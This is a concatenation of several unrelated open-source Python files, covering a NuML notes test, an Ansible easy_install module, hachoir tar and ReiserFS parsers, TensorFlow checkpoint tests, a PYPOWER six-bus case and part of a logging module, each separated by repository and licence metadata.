from __future__ import print_function
import libnuml
from libnuml import readNUMLFromFile, writeNUML, writeNUMLToString, XMLNode, NUMLDocument
from libsignetsim import Settings
from unittest import TestCase
from os.path import join, dirname
from six.moves import reload_module
class TestExampleNotes(TestCase):
    """ Tests high level functions """

    def testExampleNotes(self):
        """Build a NuML document with an ontology term and XHTML notes,
        serialize it, write it to disk and read it back.

        NOTE(review): this test makes no assertions -- presumably it only
        guards against exceptions during the round trip; consider asserting
        that the re-read document equals the written one.
        """
        print("\n\n")
        numl_doc = NUMLDocument()
        # Reload of libnuml -- presumably to reset library-global state
        # between tests; confirm this is still required.
        reload_module(libnuml)

        time_term = numl_doc.createOntologyTerm()
        time_term.setId("time_term")
        time_term.setTerm("time")
        time_term.setSourceTermId("SBO:0000345")
        time_term.setOntologyURI("http://www.ebi.ac.uk/sbo/")

        notes = "<notes><body xmlns=\"http://www.w3.org/1999/xhtml\"><p>This needs to be noted</p></body></notes>"
        xml_notes = XMLNode.convertStringToXMLNode(notes)
        numl_doc.setNotes(xml_notes)

        numl_doc_string = writeNUMLToString(numl_doc)
        numl_doc_filename = join(Settings.tempDirectory, "example_notes.xml")
        writeNUML(numl_doc, numl_doc_filename)
        numl_doc_copy_file = readNUMLFromFile(numl_doc_filename)
| gpl-3.0 |
47lining/ansible-modules-core | packaging/language/easy_install.py | 73 | 6261 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Matt Wright <matt@nobien.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
import tempfile
import os.path
DOCUMENTATION = '''
---
module: easy_install
short_description: Installs Python libraries
description:
- Installs Python libraries, optionally in a I(virtualenv)
version_added: "0.7"
options:
name:
description:
- A Python library name
required: true
default: null
aliases: []
virtualenv:
description:
- an optional I(virtualenv) directory path to install into. If the
I(virtualenv) does not exist, it is created automatically
required: false
default: null
virtualenv_site_packages:
version_added: "1.1"
description:
- Whether the virtual environment will inherit packages from the
global site-packages directory. Note that if this setting is
changed on an already existing virtual environment it will not
have any effect, the environment must be deleted and newly
created.
required: false
default: "no"
choices: [ "yes", "no" ]
virtualenv_command:
version_added: "1.1"
description:
- The command to create the virtual environment with. For example
C(pyvenv), C(virtualenv), C(virtualenv2).
required: false
default: virtualenv
executable:
description:
- The explicit executable or a pathname to the executable to be used to
run easy_install for a specific version of Python installed in the
system. For example C(easy_install-3.3), if there are both Python 2.7
and 3.3 installations in the system and you want to run easy_install
for the Python 3.3 installation.
version_added: "1.3"
required: false
default: null
notes:
- Please note that the M(easy_install) module can only install Python
libraries. Thus this module is not able to remove libraries. It is
generally recommended to use the M(pip) module which you can first install
using M(easy_install).
- Also note that I(virtualenv) must be installed on the remote host if the
C(virtualenv) parameter is specified.
requirements: [ "virtualenv" ]
author: Matt Wright
'''
EXAMPLES = '''
# Examples from Ansible Playbooks
- easy_install: name=pip
# Install Bottle into the specified virtualenv.
- easy_install: name=bottle virtualenv=/webapps/myapp/venv
'''
def _is_package_installed(module, name, easy_install):
cmd = '%s --dry-run %s' % (easy_install, name)
rc, status_stdout, status_stderr = module.run_command(cmd)
return not ('Reading' in status_stdout or 'Downloading' in status_stdout)
def _get_easy_install(module, env=None, executable=None):
    """Locate the easy_install executable to use.

    An absolute *executable* wins outright; a bare name is tried first,
    falling back to plain 'easy_install'.  When *env* (a virtualenv path)
    is given, its bin directory is searched before the system PATH.
    """
    candidate_easy_inst_basenames = ['easy_install']
    easy_install = None
    if executable is not None:
        if os.path.isabs(executable):
            easy_install = executable
        else:
            candidate_easy_inst_basenames.insert(0, executable)
    if easy_install is None:
        if env is None:
            opt_dirs = []
        else:
            # Try easy_install with the virtualenv directory first.
            opt_dirs = ['%s/bin' % env]
        for basename in candidate_easy_inst_basenames:
            easy_install = module.get_bin_path(basename, False, opt_dirs)
            if easy_install is not None:
                break
        # easy_install should have been found by now. The final call to
        # get_bin_path will trigger fail_json.
        if easy_install is None:
            basename = candidate_easy_inst_basenames[0]
            easy_install = module.get_bin_path(basename, True, opt_dirs)
    return easy_install
def main():
    """Ansible module entry point: optionally create a virtualenv, then
    install the requested package with easy_install if it is missing."""
    arg_spec = dict(
        name=dict(required=True),
        virtualenv=dict(default=None, required=False),
        virtualenv_site_packages=dict(default='no', type='bool'),
        virtualenv_command=dict(default='virtualenv', required=False),
        executable=dict(default='easy_install', required=False),
    )

    module = AnsibleModule(argument_spec=arg_spec, supports_check_mode=True)

    name = module.params['name']
    env = module.params['virtualenv']
    executable = module.params['executable']
    site_packages = module.params['virtualenv_site_packages']
    virtualenv_command = module.params['virtualenv_command']

    # Accumulated exit code and output across the virtualenv-creation and
    # install steps.
    rc = 0
    err = ''
    out = ''

    if env:
        virtualenv = module.get_bin_path(virtualenv_command, True)

        # bin/activate existing is used as the marker that the virtualenv
        # has already been created.
        if not os.path.exists(os.path.join(env, 'bin', 'activate')):
            if module.check_mode:
                module.exit_json(changed=True)
            command = '%s %s' % (virtualenv, env)
            if site_packages:
                command += ' --system-site-packages'
            cwd = tempfile.gettempdir()
            rc_venv, out_venv, err_venv = module.run_command(command, cwd=cwd)

            rc += rc_venv
            out += out_venv
            err += err_venv

    easy_install = _get_easy_install(module, env, executable)

    cmd = None
    changed = False
    installed = _is_package_installed(module, name, easy_install)

    if not installed:
        if module.check_mode:
            module.exit_json(changed=True)
        cmd = '%s %s' % (easy_install, name)
        rc_easy_inst, out_easy_inst, err_easy_inst = module.run_command(cmd)

        rc += rc_easy_inst
        out += out_easy_inst
        err += err_easy_inst

        changed = True

    if rc != 0:
        module.fail_json(msg=err, cmd=cmd)

    module.exit_json(changed=changed, binary=easy_install,
                     name=name, virtualenv=env)
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
Cl3MM/metagoofil | hachoir_parser/archive/tar.py | 95 | 4443 | """
Tar archive parser.
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
Enum, UInt8, SubFile, String, NullBytes)
from hachoir_core.tools import humanFilesize, paddingSize, timestampUNIX
from hachoir_core.endian import BIG_ENDIAN
import re
class FileEntry(FieldSet):
    """One 512-byte tar header, plus the file content it describes."""

    # Mapping of the type flag byte to a human readable name.
    type_name = {
        # 48 is "0", 49 is "1", ...
        0: u"Normal disk file (old format)",
        48: u"Normal disk file",
        49: u"Link to previously dumped file",
        50: u"Symbolic link",
        51: u"Character special file",
        52: u"Block special file",
        53: u"Directory",
        54: u"FIFO special file",
        55: u"Contiguous file"
    }

    def getOctal(self, name):
        # Tar stores numbers as octal ASCII text.
        return self.octal2int(self[name].value)

    def getDatetime(self):
        """
        Create modification date as Unicode string, may raise ValueError.
        """
        timestamp = self.getOctal("mtime")
        return timestampUNIX(timestamp)

    def createFields(self):
        # Fixed-layout 512-byte POSIX/ustar header.
        yield String(self, "name", 100, "Name", strip="\0", charset="ISO-8859-1")
        yield String(self, "mode", 8, "Mode", strip=" \0", charset="ASCII")
        yield String(self, "uid", 8, "User ID", strip=" \0", charset="ASCII")
        yield String(self, "gid", 8, "Group ID", strip=" \0", charset="ASCII")
        yield String(self, "size", 12, "Size", strip=" \0", charset="ASCII")
        yield String(self, "mtime", 12, "Modification time", strip=" \0", charset="ASCII")
        yield String(self, "check_sum", 8, "Check sum", strip=" \0", charset="ASCII")
        yield Enum(UInt8(self, "type", "Type"), self.type_name)
        yield String(self, "lname", 100, "Link name", strip=" \0", charset="ISO-8859-1")
        yield String(self, "magic", 8, "Magic", strip=" \0", charset="ASCII")
        yield String(self, "uname", 32, "User name", strip=" \0", charset="ISO-8859-1")
        yield String(self, "gname", 32, "Group name", strip=" \0", charset="ISO-8859-1")
        yield String(self, "devmajor", 8, "Dev major", strip=" \0", charset="ASCII")
        yield String(self, "devminor", 8, "Dev minor", strip=" \0", charset="ASCII")
        yield NullBytes(self, "padding", 167, "Padding (zero)")

        # File content follows the header, padded up to a 512-byte boundary.
        filesize = self.getOctal("size")
        if filesize:
            yield SubFile(self, "content", filesize, filename=self["name"].value)

        size = paddingSize(self.current_size//8, 512)
        if size:
            yield NullBytes(self, "padding_end", size, "Padding (512 align)")

    def convertOctal(self, chunk):
        return self.octal2int(chunk.value)

    def isEmpty(self):
        # An all-zero header (empty name) marks the archive terminator.
        return self["name"].value == ""

    def octal2int(self, text):
        # Malformed octal fields are treated as 0 rather than failing.
        try:
            return int(text, 8)
        except ValueError:
            return 0

    def createDescription(self):
        if self.isEmpty():
            desc = "(terminator, empty header)"
        else:
            filename = self["name"].value
            filesize = humanFilesize(self.getOctal("size"))
            desc = "(%s: %s, %s)" % \
                   (filename, self["type"].display, filesize)
        return "Tar File " + desc
class TarFile(Parser):
    """Parser for tar archives: a sequence of FileEntry records ended by an
    all-zero terminator header."""
    endian = BIG_ENDIAN
    PARSER_TAGS = {
        "id": "tar",
        "category": "archive",
        "file_ext": ("tar",),
        "mime": (u"application/x-tar", u"application/x-gtar"),
        "min_size": 512*8,
        "magic": (("ustar \0", 257*8),),
        "subfile": "skip",
        "description": "TAR archive",
    }
    # Matches the ustar magic at offset 257, or an old-format header where
    # that area is blank/NUL.
    _sign = re.compile("ustar *\0|[ \0]*$")

    def validate(self):
        if not self._sign.match(self.stream.readBytes(257*8, 8)):
            return "Invalid magic number"
        if self[0].name == "terminator":
            return "Don't contain any file"
        # The numeric header fields of the first entry must be valid octal.
        try:
            int(self["file[0]/uid"].value, 8)
            int(self["file[0]/gid"].value, 8)
            int(self["file[0]/size"].value, 8)
        except ValueError:
            return "Invalid file size"
        return True

    def createFields(self):
        while not self.eof:
            field = FileEntry(self, "file[]")
            if field.isEmpty():
                yield NullBytes(self, "terminator", 512)
                break
            yield field
        if self.current_size < self._size:
            yield self.seekBit(self._size, "end")

    def createContentSize(self):
        # Archive content ends right after the terminator block.
        return self["terminator"].address + self["terminator"].size
| gpl-2.0 |
coderbone/SickRage-alt | lib/hachoir_parser/file_system/reiser_fs.py | 74 | 6910 | """
ReiserFS file system version 3 parser (other version have not been tested).
Author: Frederic Weisbecker
Creation date: 8 december 2006
Sources:
- http://p-nand-q.com/download/rfstool/reiserfs_docs.html
- http://homes.cerias.purdue.edu/~florian/reiser/reiserfs.php
- file://usr/src/linux-2.6.16.19/include/linux/reiserfs_fs.h
NOTES:
The most part of the description of the structures, their fields and their
comments described here come from the file include/linux/reiserfs_fs.h
- written by Hans reiser - located in the Linux kernel 2.6.16.19 and from
the Reiserfs explanations in
http://p-nand-q.com/download/rfstool/reiserfs_docs.html written by Gerson
Kurz.
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, Enum,
UInt16, UInt32, String, RawBytes, NullBytes, SeekableFieldSet, Bit)
from hachoir_core.endian import LITTLE_ENDIAN
class BlockState(Bit):
    """The state (used/free) of a ReiserFs Block"""
    STATE={
        True : "used",
        False : "free"
    }
    # Class-level counter: every instance takes the next block number, so
    # numbering continues across bitmap blocks (process-wide state).
    block_nb = 0
    def __init__(self, parent, name, nb_block):
        """@param nb_block: Number of the block concerned

        NOTE(review): nb_block is currently ignored — the number is taken
        from the shared class counter instead. Confirm this is intended
        before removing or using the parameter.
        """
        Bit.__init__(self, parent, name)
        self.block_nb = self.__class__.block_nb
        self.__class__.block_nb += 1
    def createDescription(self):
        return "State of the block %d" % self.block_nb
    def createDisplay(self):
        # Map the raw bit value to "used"/"free".
        return self.STATE[Bit.createValue(self)]
class BitmapBlock(SeekableFieldSet):
    """ The bitmap blocks are Reiserfs blocks where each byte contains
    the state of 8 blocks in the filesystem. So each bit will describe
    the state of a block to tell if it is used or not.
    """
    def createFields(self):
        # One bit per filesystem block: a bitmap block of `block_size`
        # bytes covers block_size * 8 blocks. (xrange: Python 2 code.)
        block_size=self["/superblock/blocksize"].value
        for i in xrange(0, block_size * 8):
            yield BlockState(self, "block[]", i)
class BitmapBlockGroup(SeekableFieldSet):
    """The group that manages the Bitmap Blocks"""
    def createFields(self):
        block_size=self["/superblock/blocksize"].value
        nb_bitmap_block = self["/superblock/bmap_nr"].value
        # Position of the first bitmap block: it immediately follows the
        # superblock's block.
        self.seekByte(REISER_FS.SUPERBLOCK_OFFSET + block_size, relative=False)
        yield BitmapBlock(self, "BitmapBlock[]", "Bitmap blocks tells for each block if it is used")
        # The other bitmap blocks: bitmap i starts at block number
        # block_size * 8 * i, hence byte offset block_size**2 * 8 * i.
        for i in xrange(1, nb_bitmap_block):
            self.seekByte( (block_size**2) * 8 * i, relative=False)
            yield BitmapBlock(self, "BitmapBlock[]", "Bitmap blocks tells for each block if it is used")
class Journal_params(FieldSet):
    """ReiserFS journal parameters: eight 32-bit fields (32 bytes)."""
    static_size = 32*8
    def createFields(self):
        # Field order mirrors the on-disk journal_params structure.
        yield UInt32(self, "1st_block", "Journal 1st block number")
        yield UInt32(self, "dev", "Journal device number")
        yield UInt32(self, "size", "Size of the journal")
        yield UInt32(self, "trans_max", "Max number of blocks in a transaction")
        #TODO: Must be explained: it was sb_journal_block_count
        yield UInt32(self, "magic", "Random value made on fs creation.")
        yield UInt32(self, "max_batch", "Max number of blocks to batch into a trans")
        yield UInt32(self, "max_commit_age", "In seconds, how old can an async commit be")
        yield UInt32(self, "max_trans_age", "In seconds, how old can a transaction be")
    def createDescription(self):
        return "Parameters of the journal"
class SuperBlock(FieldSet):
    """ReiserFS superblock (v1 + v2 fields parsed as one structure)."""
    #static_size = 204*8
    UMOUNT_STATE = { 1: "unmounted", 2: "not unmounted" }
    HASH_FUNCTIONS = {
        0: "UNSET_HASH",
        1: "TEA_HASH",
        2: "YURA_HASH",
        3: "R5_HASH"
    }
    def createFields(self):
        #TODO: This structure is normally divided in two parts:
        # _reiserfs_super_block_v1
        # _reiserfs_super_block
        # It will be divided later to easily support older version of the first part
        yield UInt32(self, "block_count", "Number of blocks")
        yield UInt32(self, "free_blocks", "Number of free blocks")
        yield UInt32(self, "root_block", "Root block number")
        # NOTE(review): this field name contains spaces, which is unusual for
        # a hachoir field path — confirm it is addressable before relying on it.
        yield Journal_params(self, "Journal parameters")
        yield UInt16(self, "blocksize", "Size of a block")
        yield UInt16(self, "oid_maxsize", "Max size of object id array")
        yield UInt16(self, "oid_cursize", "Current size of object id array")
        yield Enum(UInt16(self, "umount_state", "Filesystem umounted or not"), self.UMOUNT_STATE)
        yield String(self, "magic", 10, "Magic string", strip="\0")
        #TODO: change the type of s_fs_state in Enum to have more details about this fsck state
        yield UInt16(self, "fs_state", "Rebuilding phase of fsck ")
        yield Enum(UInt32(self, "hash_function", "Hash function to sort names in a directory"), self.HASH_FUNCTIONS)
        yield UInt16(self, "tree_height", "Height of disk tree")
        yield UInt16(self, "bmap_nr", "Amount of bitmap blocks needed to address each block of file system")
        #TODO: find a good description for this field
        yield UInt16(self, "version", "Field only reliable on filesystem with non-standard journal")
        yield UInt16(self, "reserved_for_journal", "Size in blocks of journal area on main device")
        #TODO: same as above
        yield UInt32(self, "inode_generation", "No description")
        #TODO: same as above and should be an enum field
        yield UInt32(self, "flags", "No description")
        #TODO: Create a special Type to format this id
        yield RawBytes(self, "uuid", 16, "Filesystem unique identifier")
        yield String(self, "label", 16, "Filesystem volume label", strip="\0")
        yield NullBytes(self, "unused", 88)
        # Pad up to the end of the superblock's block (204 bytes parsed so far).
        yield NullBytes(self, "Bytes before end of the block", self["blocksize"].value-204)
    def createDescription(self):
        return "Superblock: ReiserFs Filesystem"
class REISER_FS(Parser):
    """Top-level ReiserFS (version 3) filesystem parser."""
    PARSER_TAGS = {
        "id": "reiserfs",
        "category": "file_system",
        # 130 blocks before the journal +
        # Minimal size of journal (513 blocks) +
        # 1 block for the rest
        # And The Minimal size of a block is 512 bytes
        "min_size": (130+513+1) * (512*8),
        "description": "ReiserFS file system"
    }
    endian = LITTLE_ENDIAN
    # Offsets (in bytes) of important information
    SUPERBLOCK_OFFSET = 64*1024
    MAGIC_OFFSET = SUPERBLOCK_OFFSET + 52
    def validate(self):
        """Return True when the superblock magic matches a known version."""
        # Let's look at the magic field in the superblock (9 bytes, the
        # longest magic; shorter magics match after stripping NUL padding).
        magic = self.stream.readBytes(self.MAGIC_OFFSET*8, 9).rstrip("\0")
        if magic in ("ReIsEr3Fs", "ReIsErFs", "ReIsEr2Fs"):
            return True
        return "Invalid magic string"
    def createFields(self):
        # 64 KiB of boot-loader padding precedes the superblock.
        yield NullBytes(self, "padding[]", self.SUPERBLOCK_OFFSET)
        yield SuperBlock(self, "superblock")
        yield BitmapBlockGroup(self, "Group of bitmap blocks")
| gpl-3.0 |
korepwx/tfsnippet | tests/scaffold/test_checkpoint.py | 1 | 6954 | import os
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.scaffold import *
from tfsnippet.scaffold.checkpoint import CHECKPOINT_VAR_NAME
from tfsnippet.utils import ensure_variables_initialized, TemporaryDirectory
class CheckpointSaverTestCase(tf.test.TestCase):
    """Unit tests for CheckpointSaver (construction, save and restore)."""
    def test_constructor(self):
        """Constructor should normalize variables/objects and reject bad input."""
        with TemporaryDirectory() as tmpdir:
            v1 = tf.get_variable('v1', dtype=tf.int32, shape=())
            with tf.variable_scope('parent'):
                v2 = tf.get_variable('v2', dtype=tf.int32, shape=())
            sv = ScheduledVariable('sv', dtype=tf.float32, initial_value=123)
            obj = Mock(
                spec=CheckpointSavableObject,
                get_state=Mock(return_value={'value': 123}),
                set_state=Mock()
            )
            obj2 = Mock(
                spec=CheckpointSavableObject,
                get_state=Mock(return_value={'value': 456}),
                set_state=Mock()
            )
            # Variables given as a list: keys derive from the variable names.
            saver = CheckpointSaver([v1, sv, v2], tmpdir + '/1',
                                    objects={'obj': obj, 'obj2': obj2})
            self.assertEqual(saver.save_dir, tmpdir + '/1')
            self.assertIsNone(saver._saver._max_to_keep)
            self.assertTrue(saver.save_meta)
            self.assertDictEqual(
                saver._var_dict,
                {'v1': v1, 'parent/v2': v2, 'sv': sv.variable,
                 CHECKPOINT_VAR_NAME: saver._serial_var.variable}
            )
            self.assertIsInstance(saver.saver, tf.train.Saver)
            # Variables given as a dict: caller-chosen keys are preserved.
            saver = CheckpointSaver(
                {'vv1': v1, 'v22': v2, 'svv': sv},
                tmpdir + '/2',
                objects={'oobj': obj, 'obj2': obj2},
                filename='variables.dat',
                max_to_keep=3, save_meta=False
            )
            self.assertEqual(saver.save_dir, tmpdir + '/2')
            self.assertEqual(saver._saver._max_to_keep, 3)
            self.assertFalse(saver.save_meta)
            self.assertDictEqual(
                saver._var_dict,
                {'vv1': v1, 'v22': v2, 'svv': sv.variable,
                 CHECKPOINT_VAR_NAME: saver._serial_var.variable}
            )
            self.assertIsInstance(saver.saver, tf.train.Saver)
            # Invalid inputs: non-variables, non-savable objects, and names
            # colliding with the reserved checkpoint variable name.
            with pytest.raises(TypeError, match='Not a variable'):
                _ = CheckpointSaver([object()], tmpdir)
            with pytest.raises(TypeError, match='Not a variable'):
                _ = CheckpointSaver([tf.constant(123.)], tmpdir)
            with pytest.raises(TypeError, match='Not a savable object'):
                _ = CheckpointSaver([], tmpdir, {'obj': object()})
            with pytest.raises(TypeError, match='Not a savable object'):
                _ = CheckpointSaver([], tmpdir, {'obj': tf.constant(0.)})
            with pytest.raises(KeyError,
                               match='Name is reserved for `variables`'):
                _ = CheckpointSaver(
                    [tf.get_variable(CHECKPOINT_VAR_NAME, dtype=tf.int32,
                                     initializer=0)],
                    tmpdir
                )
            with pytest.raises(KeyError,
                               match='Name is reserved for `variables`'):
                _ = CheckpointSaver(
                    {CHECKPOINT_VAR_NAME: tf.get_variable(
                        'a', dtype=tf.int32, initializer=0)},
                    tmpdir
                )
            with pytest.raises(KeyError,
                               match='Name is reserved for `objects`'):
                _ = CheckpointSaver([], tmpdir, {CHECKPOINT_VAR_NAME: obj})
    def test_save_restore(self):
        """Round-trip variables and savable-object state through checkpoints."""
        class MyObject(CheckpointSavableObject):
            # Minimal savable object: its whole __dict__ is the state.
            def __init__(self, value):
                self.value = value
            def get_state(self):
                return self.__dict__
            def set_state(self, state):
                # Replace the instance state entirely with `state`.
                keys = list(self.__dict__)
                for k in keys:
                    if k not in state:
                        self.__dict__.pop(k)
                for k in state:
                    self.__dict__[k] = state[k]
        with TemporaryDirectory() as tmpdir, \
                self.test_session() as sess:
            save_dir = os.path.join(tmpdir, 'saves')
            v = tf.get_variable('v', dtype=tf.int32, initializer=12)
            sv = ScheduledVariable('sv', dtype=tf.float32, initial_value=34)
            obj = MyObject(56)
            obj2 = MyObject(90)
            ensure_variables_initialized()
            # test construct a saver upon empty directory
            saver = CheckpointSaver([v, sv], save_dir,
                                    objects={'obj': obj, 'obj2': obj2})
            self.assertIsNone(saver.latest_checkpoint())
            with pytest.raises(IOError, match='No checkpoint file is found'):
                saver.restore_latest()
            saver.restore_latest(ignore_non_exist=True, session=sess)
            # save the first checkpoint
            ckpt_0 = saver.save(0)
            self.assertEqual(saver.latest_checkpoint(), ckpt_0)
            # now we change the states
            sess.run(tf.assign(v, 1212))
            sv.set(3434)
            obj.value = 5656
            obj.value2 = 7878
            obj2.value = 9090
            ckpt_1 = saver.save(1, session=sess)
            self.assertEqual(saver.latest_checkpoint(), ckpt_1)
            # construct a saver on existing checkpoint directory
            saver = CheckpointSaver([v, sv], save_dir,
                                    objects={'obj': obj, 'obj2': obj2})
            self.assertEqual(saver.latest_checkpoint(), ckpt_1)
            # restore the latest checkpoint
            saver.restore_latest()
            self.assertListEqual(sess.run([v, sv]), [1212, 3434])
            self.assertEqual(obj.value, 5656)
            self.assertEqual(obj.value2, 7878)
            self.assertEqual(obj2.value, 9090)
            # restore a previous checkpoint
            saver.restore(ckpt_0, sess)
            self.assertListEqual(sess.run([v, sv]), [12, 34])
            self.assertEqual(obj.value, 56)
            self.assertFalse(hasattr(obj, 'value2'))
            self.assertEqual(obj2.value, 90)
            # try to restore only a partial of the variables and objects
            saver = CheckpointSaver([v], save_dir, objects={'obj': obj})
            saver.restore_latest()
            self.assertListEqual(sess.run([v, sv]), [1212, 34])
            self.assertEqual(obj.value, 5656)
            self.assertEqual(obj.value2, 7878)
            self.assertEqual(obj2.value, 90)
            # try to restore a non-exist object
            saver = CheckpointSaver([v], save_dir, objects={'obj3': obj})
            with pytest.raises(KeyError, match='Object `obj3` not found in the '
                                               'checkpoint'):
                saver.restore_latest()
| mit |
praba230890/PYPOWER | pypower/case6ww.py | 2 | 2963 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.
"""
from numpy import array
def case6ww():
    """Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.

    Please see L{caseformat} for details on the case file format.

    This is the 6 bus example from pp. 104, 112, 119, 123-124, 549 of
    I{"Power Generation, Operation, and Control, 2nd Edition"},
    by Allen. J. Wood and Bruce F. Wollenberg, John Wiley & Sons, NY, Jan 1996.

    @return: Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.
    """
    ppc = {"version": '2'}
    ##-----  Power Flow Data  -----##
    ## system MVA base
    ppc["baseMVA"] = 100.0
    ## bus data
    # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
    # (type column: bus 1 is the reference bus; presumably MATPOWER
    # conventions 3=ref, 2=PV, 1=PQ — verify against caseformat.)
    ppc["bus"] = array([
        [1, 3, 0, 0, 0, 0, 1, 1.05, 0, 230, 1, 1.05, 1.05],
        [2, 2, 0, 0, 0, 0, 1, 1.05, 0, 230, 1, 1.05, 1.05],
        [3, 2, 0, 0, 0, 0, 1, 1.07, 0, 230, 1, 1.07, 1.07],
        [4, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95],
        [5, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95],
        [6, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95]
    ])
    ## generator data
    # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
    # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
    ppc["gen"] = array([
        [1, 0, 0, 100, -100, 1.05, 100, 1, 200, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [2, 50, 0, 100, -100, 1.05, 100, 1, 150, 37.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [3, 60, 0, 100, -100, 1.07, 100, 1, 180, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    ])
    ## branch data
    # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
    ppc["branch"] = array([
        [1, 2, 0.1, 0.2, 0.04, 40, 40, 40, 0, 0, 1, -360, 360],
        [1, 4, 0.05, 0.2, 0.04, 60, 60, 60, 0, 0, 1, -360, 360],
        [1, 5, 0.08, 0.3, 0.06, 40, 40, 40, 0, 0, 1, -360, 360],
        [2, 3, 0.05, 0.25, 0.06, 40, 40, 40, 0, 0, 1, -360, 360],
        [2, 4, 0.05, 0.1, 0.02, 60, 60, 60, 0, 0, 1, -360, 360],
        [2, 5, 0.1, 0.3, 0.04, 30, 30, 30, 0, 0, 1, -360, 360],
        [2, 6, 0.07, 0.2, 0.05, 90, 90, 90, 0, 0, 1, -360, 360],
        [3, 5, 0.12, 0.26, 0.05, 70, 70, 70, 0, 0, 1, -360, 360],
        [3, 6, 0.02, 0.1, 0.02, 80, 80, 80, 0, 0, 1, -360, 360],
        [4, 5, 0.2, 0.4, 0.08, 20, 20, 20, 0, 0, 1, -360, 360],
        [5, 6, 0.1, 0.3, 0.06, 40, 40, 40, 0, 0, 1, -360, 360]
    ])
    ##-----  OPF Data  -----##
    ## generator cost data
    # 1 startup shutdown n x1 y1 ... xn yn
    # 2 startup shutdown n c(n-1) ... c0
    # Model 2: polynomial costs with 3 coefficients (quadratic).
    ppc["gencost"] = array([
        [2, 0, 0, 3, 0.00533, 11.669, 213.1],
        [2, 0, 0, 3, 0.00889, 10.333, 200],
        [2, 0, 0, 3, 0.00741, 10.833, 240]
    ])
    return ppc
| bsd-3-clause |
tomholub/tooth | tooth/log.py | 1 | 6337 | __author__ = 'Tom James Holub'
import sys
import pprint
import traceback
import string
import os
import datetime
import json
import thread
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from .config import Config
# Module-wide configuration and log locations, resolved once at import time.
config = Config()
ACCESSDIR = config.get('path', 'access')  # per-identifier access logs
ERRORDIR = config.get('path', 'error')  # generic error log and flag files
EXCEPTIONDIR = config.get('path', 'exception')  # one sub-directory per exception type
SLASH = '/' if config.get('environment', 'os') == 'unix' else '\\'  # host path separator
DEBUG_EMAIL_FAILED = ERRORDIR + "DEBUG_EMAIL_FAILED"  # marker file: notification e-mail failed
MAX_SIMILAR_ERRORS_SAVED = 50  # cap on saved report files per exception type
def access(identifiers, function, request, response, source='REQUEST'):
    """Append one log line describing a request/response pair.

    Responses carrying a "success" key go to a per-identifier access log
    under ACCESSDIR; anything else is treated as an error and appended to
    the shared error log under ERRORDIR.
    """
    if "success" in response:  # membership test directly on the dict
        filename = "anonymous" if not identifiers else '_'.join(map(str, identifiers))
        filepath = "%s%s.log" % (ACCESSDIR, filename)
    else:
        filepath = "%s%s.log" % (ERRORDIR, 'error')
    # Serialize the request defensively: it may contain non-JSON values.
    try:
        json_request = json.dumps(request)
    except TypeError:
        # (typo "serializabke" fixed in the fallback message)
        json_request = "not serializable, keys: %s" % (','.join(request.keys()))
    with open(filepath, "a") as myfile:
        myfile.write("[%s %s] %s ---------- %s\n" % (source, function, json.dumps(response), json_request))
def internal(filename, line):
    """Append *line* to the named internal log file under ACCESSDIR."""
    log_path = "%s%s.log" % (ACCESSDIR, filename)
    with open(log_path, "a") as handle:
        handle.write("%s\n" % line)
def _formatted_exception_dir_name(exc_info):
    """Build a filesystem-safe directory name 'E_<Type>___<message><SLASH>'."""
    exc_type, exc_value, _ = exc_info
    allowed = "-_.() %s%s" % (string.ascii_letters, string.digits)
    raw = str(exc_type.__name__) + '___' + str(exc_value)
    # Keep only safe characters, then normalize the remaining separators.
    safe = ''.join(ch for ch in raw if ch in allowed)
    safe = safe.replace(' ', '_').replace('(', '_').replace(')', '_')
    # Truncate to keep directory names within filesystem limits.
    return 'E_' + safe[:100] + SLASH
def _notification_title(dir_name):
return 'New unhandled exception (' + dir_name[:100] + ')'
def _exception_text_array(dump, stdout, exc_info):
exc_type, exc_value, exc_traceback = exc_info
dump = dump or []
content = [
'############################################',
'# Stack Trace ##############################',
'############################################',
''
]
if exc_type is None:
return None
try:
if type(dump) == list:
dump.append(exc_value.data)
elif type(dump) == dict:
dump['exception'] = exc_value.data
elif dump is None:
dump = {'exception': exc_value.data}
except AttributeError:
pass
content += traceback.format_exception(exc_type, exc_value, exc_traceback)
content += ['', '#############', '# Data ######', '#############', '']
content += [pprint.pformat(dump)]
content += ['', '', '#############', '# Stdout ####', '#############', '']
content += [str(stdout)]
return content
def _exception_log_dir_exists(exception_log_dir_name):
    # NOTE(review): despite its name, this returns True when the directory
    # does NOT exist yet.  The caller uses the result as "first occurrence
    # of this exception type", which matches the inverted logic, but the
    # name is misleading — consider renaming at the next refactor (renaming
    # now would break the caller in exception()).
    return not os.path.exists(EXCEPTIONDIR + exception_log_dir_name)
